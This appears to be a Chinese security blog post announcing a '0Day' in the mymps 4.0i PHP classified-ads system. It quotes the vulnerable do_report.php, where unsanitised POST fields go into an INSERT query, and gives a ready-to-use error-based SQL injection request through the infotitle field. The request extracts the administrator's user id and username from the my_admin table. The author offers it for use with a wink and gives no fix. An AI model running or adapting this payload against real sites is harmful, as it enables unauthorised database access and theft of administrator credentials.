蚂蚁php分类信息系统mymps 4.0i utf版0Day

  • A+
所属分类:漏洞时代
摘要

文件do_report.php[php]<?php
!defined(‘IN_MYMPS’) && exit(‘FORBIDDEN’);
require_once MYMPS_DATA.”/config.db.php”;
require_once MYMPS_INC.”/db.class.php”;
$ip                  = GetIP();
$infoid                 = isset($_POST[‘infoid’])           ? intval($_POST[‘infoid’])  : ”;
$infotitle         = isset($_POST[‘infotitle’]) ? trim($_POST[‘infotitle’]) : ”; //
$content         = isset($_POST[‘content’]) ? trim($_POST[‘content’]) : ”;//
$report_type = isset($_POST[‘report_type’]) ? trim($_POST[‘report_type’]) : ”;//

文件do_report.php

[php]<?php
!defined('IN_MYMPS') && exit('FORBIDDEN');
require_once MYMPS_DATA."/config.db.php";
require_once MYMPS_INC."/db.class.php";
$ip                  = GetIP();
$infoid                 = isset($_POST['infoid'])           ? intval($_POST['infoid'])  : '';
$infotitle         = isset($_POST['infotitle']) ? trim($_POST['infotitle']) : ''; //
$content         = isset($_POST['content']) ? trim($_POST['content']) : '';//
$report_type = isset($_POST['report_type']) ? trim($_POST['report_type']) : '';//

if(mymps_count("info_report","WHERE infoid = '$infoid' AND ip = '$ip' AND pubtime > '".mktime(0,0,0)."'") > 0){
echo "<center style=/"color:red; font-weight:bold/">操作失败,该信息您已经举报过了!</font>";
exit;
}
$db->query("INSERT INTO `{$db_mymps}info_report` (report_type,content,infoid,infotitle,ip,pubtime)VALUES('$report_type','$content','$infoid','$infotitle','$ip','".$timestamp."')");
echo "<div style=/"margin:10px 15px/"><font style=/"color:red; font-size:12px/"><h1>感谢您的举报 :)</h1>● 在".$mymps_global[SiteName].",每天有数千条违规信息通过用户举报被删除。● 如果你是不小心点错了举报按钮,别担心。只有当一个信息收到一定数量的举报时才会被删除。</font></div>";
?>[/php]

 

利用代码如下:

代码如下
[php]part=do_report&infoid=87382231&infotitle=123','ip1',(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,userid,0x2D,uname,0x7E31)%20FROM%20my_admin%20where id=1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))#&report_type=2&content=asasas[/php]
infoid需要修改下,不然,你懂的。哈哈。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: